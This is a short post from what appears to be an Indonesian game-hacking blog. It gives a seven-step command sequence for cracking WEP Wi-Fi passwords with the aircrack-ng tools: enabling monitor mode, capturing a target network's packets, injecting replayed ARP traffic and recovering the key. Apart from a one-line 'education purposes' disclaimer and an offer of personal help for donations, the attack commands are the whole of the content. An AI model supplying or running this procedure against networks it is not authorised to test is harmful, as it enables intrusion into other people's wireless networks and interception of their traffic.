Posted by : GaNz Sabtu, 19 Mei 2012

This is a tutorial on how to crack a WEP encrypted password. This information should only be used for education purposes.


Steps:
1)airmon-ng
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap


If you need any help feel free to PM me or shoot me an instant message, a donation would also be appreciated.
You can instant message me at:
 Video -

Download Backtrack 5 - http://www.backtrack-linux.org/downloads/

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Connect

My Song

Ads 468x60px

Featured Posts

Welcome to My Blog
Free CSS Vertical Menu Designs at exploding-boy.com

Tab Menu 12

Popular Post

™[]Selamat Datang Di Blog kami!![]™

Visitor

free counters

Total

Sharingan

Sharingan

Blogroll

Labels

Poto PropiL

NavBar

Kunai

Background

COMEN

WAU_colored('aycw41907oxu', '000000f7efff')

Translate

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

this widget by www.AllBlogTools.com

Online

CLOCK

Labels

Labels

Followers

Archive

GaNz Cheaterz

ℤ[]Trima Kasih Datang Di Blog kami!![]ℤ

- Copyright © 2013 Ninja Saga Hack Insyndicate -Dark Amaterasu Template -